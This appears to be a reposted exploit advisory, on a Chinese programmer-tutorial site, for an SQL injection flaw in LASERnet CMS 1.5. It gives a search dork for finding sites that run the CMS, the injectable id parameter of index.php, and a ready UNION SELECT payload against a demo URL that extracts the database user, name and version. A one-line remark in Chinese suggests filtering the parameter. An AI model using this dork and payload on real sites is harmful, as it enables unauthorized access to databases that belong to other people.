Title : LASERnet CMS Vulnerable to SQL Injection Vendor : http://lasernet.gr/cms.php Dork : intext:"Powered by Lasernet" Category: WebApps http://www.2cto.com /index.php?id=[SQL] Demo: http://www.2cto.com /index.php ?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+
修复:过滤index.php页面id参数输入
查看更多关于Lasernet CMS 1.5版sql注射缺陷及修复 - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11593